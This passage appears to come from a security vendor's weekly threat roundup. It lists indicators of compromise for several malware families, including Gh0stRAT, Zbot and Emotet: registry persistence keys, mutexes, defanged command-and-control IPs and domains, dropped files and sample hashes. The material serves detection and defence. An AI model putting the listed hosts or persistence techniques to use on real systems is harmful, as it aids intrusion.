\n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\FILENAME ` | 2 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\FILENAME\\OPTIONS ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\46646D0F2E8E990ABE331586D98FE95A61DC40D7CB2C05144A09FD8B956F7526.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\2374D2482BFECB87307D036B7E9750A0C28738C8A0AFD4ABF60A9B9EA3B81E83\\OPTIONS ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9\\OPTIONS ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674 ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\2374D2482BFECB87307D036B7E9750A0C28738C8A0AFD4ABF60A9B9EA3B81E83\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674\\OPTIONS ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\938456E91538B5F4267BEDB11D8CCA26229F3DBDB3C24FF3A1132F3970C0D24A\\OPTIONS ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\938456E91538B5F4267BEDB11D8CCA26229F3DBDB3C24FF3A1132F3970C0D24A\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674.EXE ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9.EXE ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\PAYMENT ` 
| 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\02B5EF62978197B43A62D05DE25C67A67CB1B4A0F09111E79CC83688E7881674.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\PAYMENT\\OPTIONS ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\RADAR\\HEAPLEAKDETECTION\\DIAGNOSEDAPPLICATIONS\\E329CA0B2964C410BA3C5D228A13B27D733D7F9999DEE5A6511F91EA891473A9.EXE \nValue Name: LastDetectionTime ` | 1 \n`<HKCU>\\SOFTWARE\\VB AND VBA PROGRAM SETTINGS\\PAYMENT\\OPTIONS \nValue Name: Show Tips at Startup ` | 1 \nMutexes | Occurrences \n---|--- \n`3749282D282E1E80C56CAE5A` | 15 \n`eDZwOHM3` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`80[.]249[.]144[.]95` | 4 \n`185[.]55[.]225[.]242` | 3 \n`107[.]175[.]150[.]73` | 3 \n`185[.]159[.]153[.]129` | 2 \n`208[.]91[.]199[.]225` | 1 \n`104[.]16[.]154[.]36` | 1 \n`142[.]11[.]234[.]232` | 1 \n`185[.]53[.]90[.]10` | 1 \n`104[.]148[.]41[.]60` | 1 \n`185[.]132[.]53[.]138` | 1 \n`167[.]172[.]184[.]185` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`iranssp[.]ir` | 2 \n`beyondlogx[.]com` | 2 \n`whatismyipaddress[.]com` | 1 \n`phoenixdevs[.]ir` | 1 \n`kontrolreport[.]com` | 1 \n`offsolo-gbb[.]tech` | 1 \n`ray-den[.]xyz` | 1 \n`avertonbullk[.]com` | 1 \n`secure-n2[.]top` | 1 \n`smtp[.]betaflexllc[.]us` | 1 \n`protestlabsmovings[.]es` | 1 \n`oscontinental[.]online` | 1 \n`porno322[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\D282E1` | 15 \n`%APPDATA%\\D282E1\\1E80C5.lck` | 15 \n`%APPDATA%\\Microsoft\\Crypto\\RSA\\S-1-5-21-2580483871-590521980-3826313501-500\\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 15 \n`%HOMEPATH%\\subfolder` | 5 \n`%HOMEPATH%\\subfolder\\filename.exe` | 2 \n`%HOMEPATH%\\subfolder\\filename.vbs` | 2 \n`%HOMEPATH%\\subfolder\\quotation.exe` | 2 \n`%HOMEPATH%\\subfolder\\quotation.vbs` | 2 \n`%APPDATA%\\pid.txt` | 1 \n`%APPDATA%\\pidloc.txt` | 1 \n`%TEMP%\\holdermail.txt` | 1 \n`%TEMP%\\holderwb.txt` | 1 \n`%TEMP%\\bhvC037.tmp` | 1 \n`%HOMEPATH%\\subfolder\\payment.exe` | 1 \n`%HOMEPATH%\\subfolder\\payment.vbs` | 1 \n \n#### File Hashes\n\n` 02b5ef62978197b43a62d05de25c67a67cb1b4a0f09111e79cc83688e7881674 2374d2482bfecb87307d036b7e9750a0c28738c8a0afd4abf60a9b9ea3b81e83 2a3ad80cfac1cd63eeba8f7d8019df51df16e22ef34d2826d0aba9a56cff5c60 2eee4a29498a0d25c8d53e306c3b2414b839363992364cabbbe3fe2fd46caa9c 32f8e0daef5bb91fb0908277ad5f5d2c97398a64a8c9ff60611a103ba0d5004f 46646d0f2e8e990abe331586d98fe95a61dc40d7cb2c05144a09fd8b956f7526 4b4ba6c0f8cbadc871bcc6b3e175a569fe292973499bbf239aaaff7e75495888 548bacb5d7484fd4d4328579d18b3e62fdbf6bb7acdf6ade4ddcf6a0db61847b 7936c85dd96e641541e6e39e7a7388b8b6b16ef97569a81efceaed4abdc62ad6 938456e91538b5f4267bedb11d8cca26229f3dbdb3c24ff3a1132f3970c0d24a bb71b57a4cbf596fb6978df0e6fbdfbbbdebec8d182a62c6ecfbaa5261117aba c5bb3fd84e761402d2da77b8c0462e9f670f56d65f3ccd602cfb4326c98c4c9a 
c5f72bae432197bdbef019507fe69905549bbb7dcf9c455bd24e6eef008e96ea cbb00a83c374bcca6a2bf0cbfabaf1f5c655d9cb046437225bbbd04988f22811 df289130d1adda822989a8255dcd2a417ad0a8f19d753dd9ebdaf78a13e3bf7e e329ca0b2964c410ba3c5d228a13b27d733d7f9999dee5a6511f91ea891473a9 ebe841b611a116cee961119df457aaa5f8b5ada4dc6e93381d59d2bb12bdf522 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Pdsl9gU3Dj0/XeqOqccKiII/AAAAAAAAC84/gZgpXFla-MwPhue5IftO9a_cPneeGrkqQCLcBGAsYHQ/s1600/df289130d1adda822989a8255dcd2a417ad0a8f19d753dd9ebdaf78a13e3bf7e_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-rwpuc1aH2a0/XeqOuD03BqI/AAAAAAAAC88/rGe5osqIbpMY7NqD2eg-Bu4MK1IlxH7fwCLcBGAsYHQ/s1600/df289130d1adda822989a8255dcd2a417ad0a8f19d753dd9ebdaf78a13e3bf7e_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-QQGGtbApk_8/XeqOy42R62I/AAAAAAAAC9A/Q9SBHgcVTJkYg4NTtHQno0BQCiSUfObZACLcBGAsYHQ/s1600/2eee4a29498a0d25c8d53e306c3b2414b839363992364cabbbe3fe2fd46caa9c_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Gh0stRAT-7414189-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: EM ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Micro ` | 15 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: SHR ` | 12 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WSCSVC \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SHAREDACCESS \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\WUAUSERV \nValue Name: Start ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\OLE \nValue Name: EnableDCOM ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\OLE \nValue Name: EnableRemoteConnect 
` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\LSA \nValue Name: restrictanonymous ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SECURITYPROVIDERS\\SCHANNEL\\PROTOCOLS\\PCT1.0\\SERVER \nValue Name: Enabled ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANSERVER\\PARAMETERS \nValue Name: AutoShareWks ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\LANMANSERVER\\PARAMETERS \nValue Name: AutoShareServer ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SECURITYPROVIDERS\\SCHANNEL\\PROTOCOLS\\PCT1.0 ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Depend ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SECURITYPROVIDERS\\SCHANNEL\\PROTOCOLS\\PCT1.0\\SERVER ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 1 \n`<HKCU>\\SOFTWARE\\CSER_513_2 ` | 1 \n`<HKCU>\\SOFTWARE\\CSER_513_2\\14B65331773AD534DADA9C7B055E34A1E6AB2A54F3D8EEC4D1DA6298F0477C71 ` | 1 \n`<HKCU>\\SOFTWARE\\CSER_513_2\\14B65331773AD534DADA9C7B055E34A1E6AB2A54F3D8EEC4D1DA6298F0477C71\\GAMESETTING ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ce ` | 1 \nMutexes | Occurrences \n---|--- \n`0x5d65r455f` | 25 \n`Mhost123.zz.am:6658` | 25 \n`host123.zz.am:6658` | 25 \n`107.163.241.193:6520` | 17 \n`M107.163.241.193:6520` | 17 \n`107.163.56.251:6658` | 12 \n`M107.163.56.251:6658` | 12 \n`{1B655094-FE2A-433c-A877-FF9793445069}` | 1 \n`Local\\https://pos.baidu.com/` | 1 \n`Global\\a80e8341-11ce-11ea-a007-00501e3ae7b5` | 1 \n`D` | 1 \n`CiM` | 1 \n`Crack iN Morroco 2k7` | 1 \n`174.139.81.2:3204` | 1 \n`M174.139.81.2:3204` | 1 \n`Global\\a9c98181-11ce-11ea-a007-00501e3ae7b5` | 1 \n`Local\\https://www.onlinedown.net/` | 1 \n`root em up` | 1 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`107[.]163[.]43[.]143` | 25 \n`107[.]163[.]43[.]235` | 25 \n`107[.]163[.]43[.]236` | 25 \n`49[.]7[.]37[.]126` | 23 \n`107[.]163[.]241[.]193` | 17 \n`107[.]163[.]241[.]185` | 15 \n`107[.]163[.]241[.]186` | 15 \n`107[.]163[.]56[.]251` | 12 \n`107[.]163[.]43[.]161` | 12 \n`107[.]163[.]56[.]240/31` | 12 \n`107[.]163[.]241[.]181` | 2 \n`107[.]163[.]43[.]144` | 2 \n`107[.]163[.]241[.]182` | 2 \n`204[.]79[.]197[.]200` | 1 \n`111[.]202[.]114[.]81` | 1 \n`104[.]192[.]110[.]245` | 1 \n`103[.]235[.]46[.]191` | 1 \n`180[.]163[.]251[.]231` | 1 \n`172[.]217[.]197[.]155` | 1 \n`185[.]10[.]104[.]120` | 1 \n`172[.]217[.]7[.]14` | 1 \n`218[.]30[.]115[.]123` | 1 \n`218[.]30[.]115[.]254` | 1 \n`39[.]156[.]66[.]108` | 1 \n`113[.]96[.]178[.]35` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`blogx[.]sina[.]com[.]cn` | 25 \n`blog[.]sina[.]com[.]cn` | 25 \n`host123[.]zz[.]am` | 25 \n`s[.]360[.]cn` | 1 \n`cpro[.]baidustatic[.]com` | 1 \n`flashservice[.]adobe[.]com` | 1 \n`www[.]beian[.]gov[.]cn` | 1 \n`zz[.]bdstatic[.]com` | 1 \n`dup[.]baidustatic[.]com` | 1 \n`www[.]google-analytics[.]com` | 1 \n`stats[.]g[.]doubleclick[.]net` | 1 \n`www[.]yisu[.]com` | 1 \n`js[.]users[.]51[.]la` | 1 \n`ia[.]51[.]la` | 1 \n`www[.]pcsoft[.]com[.]cn` | 1 \n`www[.]onlinedown[.]net` | 1 \n`si[.]trustutn[.]org` | 1 \n`e[.]so[.]com` | 1 \n`sqdownb[.]onlinedown[.]net` | 1 \n`www[.]idc400[.]com` | 1 \n`bgp[.]zzidc[.]com` | 1 \n`hj[.]dun[.]gsxzq[.]com` | 1 \n`news[.]onlinedown[.]net` | 1 \n`s[.]ssl[.]qhres[.]com` | 1 \n`uuid[.]users[.]51[.]la` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`\\1.txt` | 55 \n`%ProgramFiles%\\<random, matching '[a-z]{5,9}\\[a-z]{3,9}'>.dll` | 54 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 50 \n`%ProgramFiles%\\<random, matching '[a-z]{5,8}'>` | 49 \n`%ProgramFiles%\\<random, matching 
'[a-z]{5,9}\\[a-z]{3,9}'>.exe` | 39 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 11 \n`%TEMP%\\1.reg` | 2 \n`%ProgramFiles%\\korlu\\11221450` | 2 \n`%ProgramFiles%\\fsshxf\\11271508` | 2 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-zA-Z0-9]{4,19}'>.exe` | 2 \n`%APPDATA%\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sxx` | 1 \n`\\tre.bat` | 1 \n`%TEMP%\\slseyc\\nfiav.dll` | 1 \n`\\a.bat` | 1 \n`%ProgramFiles%\\vpcat\\11271508` | 1 \n`%ProgramFiles%\\blzmv\\11271508` | 1 \n`%ProgramFiles%\\zuxlr\\11271508` | 1 \n`%ProgramFiles%\\hyabka\\11271508` | 1 \n`%ProgramFiles%\\gkzmahvre\\11271508` | 1 \n`%ProgramFiles%\\gkzmahvre` | 1 \n`%ProgramFiles%\\yudusnhlp\\11271508` | 1 \n`%ProgramFiles%\\jkixqof\\11271508` | 1 \n`%ProgramFiles%\\yudusnhlp` | 1 \n`%ProgramFiles%\\tjsmc\\11271508` | 1 \n`%ProgramFiles%\\ezsor\\11271508` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 00275609032024a2a413b2697b6763c964a5eeb54709ae803b68d5a77d1b46a4 019f88e9cc8c503c1ac8c6054beb978b445922cf5857f347bc8b2193a0592e82 037e1df212fbfc6c77ea55754f52b11366da8e0fd5437834762339a30e705614 04d5f107aa253ca81d99fce0201dcb6da6b21497fce62e2d37a90661951c63d8 06ee23a5be29f166749cd47784c9dafe66c0ca4ec7b70e6e837e59ccd5a02c63 072e4fa823cf7e9646dd7e1aaa3a308d9e789700dccffacfb646bf7c7fad9ad3 07ffdb94e32a95dc75d39528b3bddc362006719fc0970c47259fc8debeaee066 08e84db9a91341f82d0dc50775e75879fc2ac20ede3abffe53cf35dc9a656019 094797bbc7234e18f2a7a30fc182a690f2f7f7b080b889ab5e6c87bb730bc911 0a03aba2e42912a9c43e5cd9c724c4991007ecd6950bda27e82446070a08bb02 0a44d155b4568d97d161d18e90e4c9e719e4c37769c2a32ca5a41d56cc101172 0af079ed6e9914b102d9c3007e7c96318a1fdb659212c35f22e2e5293d8cbeb9 0c7cf7681e128b45acaf925d598acf037177748402ab92fdf114a4d2dc5fd4ae 0dc8ab2ec624c65ff0c071b80b349c8e6de4fc4491e9751e099b63ce98c8c52e 0dd6bc63d982e053c01753cb5819362827bde9338b3d28a0b17669c0523489e0 0f75c94f848e561c2fe1bd90a5260e47267c334444579530ddfe2ad90f0e6806 
1035eeb50c81c381f7b2909d062fb6d51d9e6ddc8c68478a3ef67d7b4a67b0f6 10eab7f3db36eacd08880c4998ab351c535f8b728cb0ed484edd0e84b5bdaf03 10fa3fefcb91d40da3285b063a8fd2c2f9187c1990689a487f1f2fea4a2e9240 12ebbeecf708d23ad4b4510374a622df85f5aaa806939204357f3d330b6de8d7 1439afcf233b1c829cbac8747623b3b05332ecd057660bc3639980ada64d1149 1466341e7ff5ca7511306ddd2253a03f5b81cfab21bda6ddd32047bd3f7e4011 14b65331773ad534dada9c7b055e34a1e6ab2a54f3d8eec4d1da6298f0477c71 1564fc8499c21f5426c4f15aaab34acc8936b43df39464f88003209c0ae3ea17 15c6ec4928627e4f9c56c567811e5b0b0b6c20b32374ac931257145d42365b61 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-Mv4aRI8AOX8/XeqTi9dUmxI/AAAAAAAAC9U/5BPzI8obZRcDnb2-JaGVErWYRthcOb2gQCLcBGAsYHQ/s1600/0f75c94f848e561c2fe1bd90a5260e47267c334444579530ddfe2ad90f0e6806_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-seXnCnM9VzQ/XeqToSRivVI/AAAAAAAAC9Y/ApMNoFB9Ha0my7yAD1iqEM5uQo3RIwnUACLcBGAsYHQ/s1600/9e933353f508b0e5e6c0dd8a5142a747729a30627f1997f494c17eb218e462bb_tg.png>)\n\n \n\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-DEtRJoer14o/XeqTtYUbPqI/AAAAAAAAC9c/djjY5iDb900bDRVCNY5DJaX-GFH5enZdQCLcBGAsYHQ/s1600/0af079ed6e9914b102d9c3007e7c96318a1fdb659212c35f22e2e5293d8cbeb9_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Zbot-7414153-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\PRIVACY \nValue Name: CleanCookies ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\DUQY \nValue Name: Sianile ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Uroxiqakh ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION 
CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104 \nValue Name: CheckSetting ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\DUQY ` | 1 \nMutexes | Occurrences \n---|--- \n`GLOBAL\\{<random GUID>}` | 1 \n`Local\\{<random GUID>}` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`5[.]56[.]133[.]47` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%System32%\\wbem\\Logs\\wbemprox.log` | 1 \n`%TEMP%\\tmp647c181c.bat` | 1 \n`%TEMP%\\tmp246f2f8d.bat` | 1 \n`%APPDATA%\\Adbe` | 1 \n`%APPDATA%\\Adbe\\udef.unu` | 1 \n`%APPDATA%\\Cukeba` | 1 \n`%APPDATA%\\Cukeba\\xoafe.idl` | 1 \n`%APPDATA%\\Olehse` | 1 \n`%APPDATA%\\Olehse\\okop.exe` | 1 \n`%APPDATA%\\Fireh\\isnib.exe` | 1 \n`%APPDATA%\\Igyg\\cuhia.obu` | 1 \n`%APPDATA%\\Igyg\\cuhia.tmp (copy)` | 1 \n \n#### File Hashes\n\n` 072bcc63bca4fa1946c71a3f9562a6d76af8fd1a5034132e2befbbde9aba9c98 15c235fefdfd798bff9bf039155762f0c0674cbf239c10df6aca52a7e2139488 2ccfd0f36677f438ff1120f21d6e5929d91531fd965dda6232ddd6de7a0c52d9 37403ce75f4908eb2e823a4e8c56c410e57441dde38c022819521a7fc3358701 40ecf36a4c2474cfff01980d68602d7bbaacfca2bdfda5ac58390b57c73b424a 522ce96681db4ef5d4731a8cf2007e7a46e650fc2f547f88d492700970b6af61 5409660ef23234d04ad204cb3791a96b3895286e258be036bfb43410e1dca08f 
59b94ae4bdf3a3f4291e67e73316632b73a369391fbed4d8f3259d0ff0dc5468 66c6cb07d601f35490752227fe1d4687fbbc47af0f219eb178f89c670adccb0a 8914444fb30823c586d7df581c201dad5f1428284b7880395f2bc49ece5a1611 8daf28936db0201df94f89bd80acaae000fa018f93d6d1a1dc131b91be665382 8ea4ffdbfb16cd39bdf20a5a51ffbd6a523b78ad9a2c78bfffb46fcf0653f550 924f2ea483135213b988584241da5e5b8b152ab427fa933089e493d2dcd92c34 a807970fdd58b833a23e0c8b611a17ea5448399336f3ec0a3ecd5036486c0b08 b22e02f4a2e6a2deabbc8ed5c7ff7d30c07c43d80e8d9d50ca1c85724a008619 b2787b4197407051f4a5fe4ddc6b483d3245222d0b6301ba67e7feae14b87342 b5f339fcebb67c4826f94c31eab0a3e8e8137a65204b03c8ee6a72a1a313a48e bf315e9e1ac06c214296722191b08a2925e5ed49dfcbba616606b8422047cb63 e014acc73e32e1d1cb74ab4049b46abb2bd5c06ee9d4c82aeca7f4440cbb011d e3ced6661c4f5fd339cba232c6693c79d30dd5bc8db5882e7a86e959537af18d f50b78d0ffed37ecbab524a44b4606ab7246711b3487af0a17343fb5fc93ffba fa58139b16a96c81b415d2cfe950fff73ca98ba9f0e09c753cb16cbb4b18b820 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### \n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-LlgRqENIhWM/XeqUmmT5XKI/AAAAAAAAC-E/3rnd7ok1qAoqKrKLPi6POIY4ynT8gIfhgCLcBGAsYHQ/s1600/b22e02f4a2e6a2deabbc8ed5c7ff7d30c07c43d80e8d9d50ca1c85724a008619_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-N8wlzMdz6nY/XeqUqd_31_I/AAAAAAAAC-I/Da-pTJl4u5gf_yiWNj7xUNiXGTrSYBo4wCLcBGAsYHQ/s1600/b22e02f4a2e6a2deabbc8ed5c7ff7d30c07c43d80e8d9d50ca1c85724a008619_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Doc.Downloader.Emotet-7413880-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyEnable ` | 15 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: 
ProxyServer ` | 15 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyOverride ` | 15 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoConfigURL ` | 15 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoDetect ` | 15 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Type ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: Start ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ErrorControl ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ImagePath ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: DisplayName ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: WOW64 ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\FUNCSITKA \nValue Name: ObjectName ` | 13 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ONDEMANDINTERFACECACHE ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\APPLICATIONVIEWMANAGEMENT\\W32:0000000000080070 ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\APPLICATIONVIEWMANAGEMENT\\W32:0000000000080070 \nValue Name: VirtualDesktop ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\APPLICATIONVIEWMANAGEMENT\\W32:000000000001025C ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\APPLICATIONVIEWMANAGEMENT\\W32:000000000001025C \nValue Name: VirtualDesktop ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: Type ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT \nValue Name: Start ` | 2 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\TITLEHANT 
